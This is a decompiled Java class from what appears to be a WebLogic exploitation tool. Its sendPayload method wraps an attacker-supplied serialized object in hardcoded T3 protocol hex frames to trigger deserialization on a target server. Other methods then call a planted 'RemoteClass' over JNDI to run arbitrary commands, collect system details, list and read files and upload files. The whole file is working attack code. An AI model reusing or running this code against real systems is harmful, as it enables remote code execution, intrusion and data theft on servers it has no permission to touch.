package serialize.exploittask.weblogic;

import java.io.OutputStream;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.URL;
import java.util.Properties;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import serialize.Utils.HttpHelper;
import weblogic.deployment.jms.JMSSessionPool;

/* loaded from: input_file:serialize/exploittask/weblogic/WeblogicUtils.class */
public class WeblogicUtils {
    public static final String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
    InitialContext initialContext;
    final String DataToSendHeader = "000009f3016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000";
    final String DataToSendFooter = "fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078";
    Socket clientSocket = null;

    public String getCommandResult(String str, String str2) throws MalformedURLException, NamingException {
        URL url = new URL(str);
        int i = 80;
        if (url.getPort() != -1) {
            i = url.getPort();
        }
        this.initialContext = getInitialContext("t3://" + url.getHost() + ":" + i);
        return ((InitApp) this.initialContext.lookup("RemoteClass")).runCmd(str2);
    }

    public String getSystemInfo(String str) throws Exception {
        URL url = new URL(str);
        int i = 80;
        if (url.getPort() != -1) {
            i = url.getPort();
        }
        this.initialContext = getInitialContext("t3://" + url.getHost() + ":" + i);
        InitApp initApp = (InitApp) this.initialContext.lookup("RemoteClass");
        StringBuilder sb = new StringBuilder();
        sb.append("Java运行时环境版本：" + initApp.getSysInfo("java.version")).append(System.lineSeparator());
        sb.append("操作系统的名称：" + initApp.getSysInfo("os.name")).append(System.lineSeparator());
        sb.append("操作系统的版本：" + initApp.getSysInfo("os.version")).append(System.lineSeparator());
        sb.append("操作系统的架构：" + initApp.getSysInfo("os.arch")).append(System.lineSeparator());
        sb.append("当前账户：" + initApp.getSysInfo("user.name")).append(System.lineSeparator());
        sb.append("用户的主目录：" + initApp.getSysInfo("user.home")).append(System.lineSeparator());
        sb.append("用户的当前工作目录：" + initApp.getSysInfo("user.dir")).append(System.lineSeparator());
        sb.append("默认的临时文件路径：" + initApp.getSysInfo("java.io.tmpdir")).append(System.lineSeparator());
        return sb.toString();
    }

    public String uploadFile(String str, String str2, String str3) throws Exception {
        URL url = new URL(str);
        int i = 80;
        if (url.getPort() != -1) {
            i = url.getPort();
        }
        this.initialContext = getInitialContext("t3://" + url.getHost() + ":" + i);
        return ((InitApp) this.initialContext.lookup("RemoteClass")).putFile(str2, str3);
    }

    public byte[] sendPayload(String str, byte[] bArr) throws Exception {
        URL url = new URL(str);
        int port = url.getPort() != -1 ? url.getPort() : 80;
        if (this.clientSocket == null) {
            this.clientSocket = new Socket(url.getHost(), port);
        }
        OutputStream outputStream = this.clientSocket.getOutputStream();
        outputStream.write("t3 10.3.6.0\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:80\n\n".getBytes());
        outputStream.flush();
        byte[] byteMerger = byteMerger(byteMerger(hexStringToBytes("000009f3016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000"), bArr), hexStringToBytes("fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078"));
        byte[] intToByte = intToByte(byteMerger.length);
        for (int i = 0; i < intToByte.length; i++) {
            byteMerger[(intToByte.length - i) - 1] = intToByte[i];
        }
        outputStream.write(byteMerger);
        outputStream.flush();
        return HttpHelper.getInstance().input2byte(this.clientSocket.getInputStream());
    }

    public String getFileList(String str, String str2) throws Exception {
        URL url = new URL(str);
        int i = 80;
        if (url.getPort() != -1) {
            i = url.getPort();
        }
        this.initialContext = getInitialContext("t3://" + url.getHost() + ":" + i);
        return ((InitApp) this.initialContext.lookup("RemoteClass")).getFileList(str2);
    }

    public String readFile(String str, String str2) throws Exception {
        URL url = new URL(str);
        int i = 80;
        if (url.getPort() != -1) {
            i = url.getPort();
        }
        this.initialContext = getInitialContext("t3://" + url.getHost() + ":" + i);
        return ((InitApp) this.initialContext.lookup("RemoteClass")).readFile(str2);
    }

    private InitialContext getInitialContext(String str) throws NamingException {
        Properties properties = new Properties();
        properties.put(JMSSessionPool.INITIAL_CONTEXT_FACTORY_PROP, "weblogic.jndi.WLInitialContextFactory");
        properties.put(JMSSessionPool.JNDI_URL_PROP, str);
        return new InitialContext(properties);
    }

    private byte[] intToByte(int i) {
        return new byte[]{(byte) (i & 255), (byte) ((i >> 8) & 255), (byte) ((i >> 16) & 255), (byte) (i >>> 24)};
    }

    public byte[] hexStringToBytes(String str) {
        if (str == null || str.equals("")) {
            return null;
        }
        String upperCase = str.toUpperCase();
        int length = upperCase.length() / 2;
        char[] charArray = upperCase.toCharArray();
        byte[] bArr = new byte[length];
        for (int i = 0; i < length; i++) {
            int i2 = i * 2;
            bArr[i] = (byte) ((charToByte(charArray[i2]) << 4) | charToByte(charArray[i2 + 1]));
        }
        return bArr;
    }

    private byte charToByte(char c) {
        return (byte) "0123456789ABCDEF".indexOf(c);
    }

    public byte[] byteMerger(byte[] bArr, byte[] bArr2) {
        byte[] bArr3 = new byte[bArr.length + bArr2.length];
        System.arraycopy(bArr, 0, bArr3, 0, bArr.length);
        System.arraycopy(bArr2, 0, bArr3, bArr.length, bArr2.length);
        return bArr3;
    }
}
